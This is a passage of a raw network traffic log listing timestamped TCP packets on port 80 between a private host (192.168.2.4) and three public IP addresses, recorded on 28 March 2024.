Mar 28, 2024 09:14:59.475591898 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475605965 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475619078 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475635052 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475647926 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475663900 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475673914 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475692034 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475709915 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475718021 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475724936 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475749016 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475752115 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475775003 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475780010 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475795031 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475799084 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475821972 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475837946 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475847960 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475861073 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475873947 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475903988 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475922108 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475934029 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475934982 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475960970 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475971937 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475984097 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475985050 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475997925 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476010084 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476026058 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476051092 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476061106 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476064920 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476078987 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476094961 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476128101 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476131916 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476145983 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476186037 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476192951 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476201057 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476232052 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476243019 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476258993 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476279974 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476289034 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476303101 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476330996 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476345062 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476361036 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476401091 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476457119 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476485014 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476501942 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476511002 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476526022 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476528883 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476556063 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476566076 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476574898 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476588011 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476624966 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476630926 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476645947 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476658106 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476682901 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476696968 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476700068 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476727009 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476737976 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476763010 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476768017 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476783037 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476807117 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476821899 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476838112 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476850986 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476876974 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476882935 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476902008 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476938009 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.476948023 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476975918 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.476994038 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.477006912 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.477031946 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.477045059 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477046013 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.477057934 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477076054 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.477092981 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477112055 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.477135897 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.477185965 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477241039 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.477257013 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477273941 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.477287054 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.477310896 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.477323055 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.477354050 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477368116 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477390051 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477404118 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477404118 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.477444887 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.477444887 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.477447987 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477499962 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477511883 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477545977 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477560043 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477567911 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.477567911 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.477598906 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477622986 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477642059 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.477650881 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477674007 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.477703094 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477709055 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.477716923 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477741957 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477751970 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.477767944 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.477788925 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.477788925 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.477803946 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.478243113 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.478286028 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.478301048 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.478327036 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.478360891 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.478389025 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.478415012 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.478435040 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.478460073 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.478481054 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.478511095 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.478519917 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.478549004 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.478562117 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.478589058 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.478599072 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.478611946 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.478738070 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.479240894 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.479424000 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.479438066 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.479450941 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.479475021 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.479496002 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.479522943 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.479533911 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.479578018 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.479613066 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.479614019 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.479650974 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.479650974 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.479971886 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.479989052 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.480024099 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.480041981 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.480341911 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.480372906 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.480386972 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.480408907 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.480420113 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.480456114 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.480462074 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.480470896 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.480484009 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.480525970 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.480525970 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.481425047 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.481443882 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.481479883 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.481504917 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.481504917 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.481543064 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.481547117 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.481561899 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.481586933 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.481595039 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.481600046 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.481626034 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.481626034 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.481662989 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.482199907 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.482215881 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.482247114 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.482260942 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.482273102 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.482278109 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.482297897 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.482304096 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.482345104 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.482350111 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.482350111 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.483069897 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.483195066 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.483200073 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.483218908 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.483232021 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.483257055 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.483269930 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.483283997 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.483302116 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.483330965 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.483362913 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.483371973 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.484082937 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.484137058 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.484149933 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.484162092 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.484174013 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.484208107 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.484210968 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.484235048 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.484239101 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.484250069 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.484287024 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.484973907 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.485011101 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.485063076 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.485079050 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.485095024 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.485104084 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.485104084 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.485120058 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.485140085 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.485153913 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.485217094 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.485940933 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.485958099 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.485995054 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.486007929 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.486022949 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.486022949 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.486030102 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.486059904 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.486074924 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.486103058 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.486126900 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.486330032 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.486845970 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.486861944 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.486933947 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.486948967 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.486960888 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.486974001 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.486978054 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.486978054 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.486999035 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.487046957 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.487046957 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.487503052 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.487551928 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.487560987 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.487612963 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.487765074 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.487795115 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.487808943 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.487834930 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.487848997 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.487854958 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.487855911 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.487894058 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.487909079 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.487932920 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.487972975 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.488724947 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.488831997 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.488847971 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.488862991 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.488893986 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.488905907 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.488919973 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.488919973 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.488950968 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.488966942 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.489000082 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.489000082 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.489027977 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.489078045 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.489794016 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.489811897 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.489840031 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.489855051 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.489865065 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.489869118 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.489886045 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.489902020 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.489928961 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.489928961 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.489948988 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.490118980 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.490134954 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.490748882 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.490767002 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.490792036 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.490804911 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.490823984 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.490823984 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.490860939 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.490884066 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.490888119 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.490901947 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.490930080 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.490931988 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.490955114 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.490966082 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.490987062 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.491014004 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.491640091 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.491657019 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.491669893 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.491682053 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.491698980 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.491707087 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.491738081 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.491738081 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.491755962 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.491770983 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.491802931 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.491811037 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.492522955 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.492583036 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.492619038 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.492664099 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.492703915 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.492719889 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.492733955 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.492747068 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.492769957 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.492803097 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.492816925 CET	80	49743	104.21.22.54	192.168.2.4
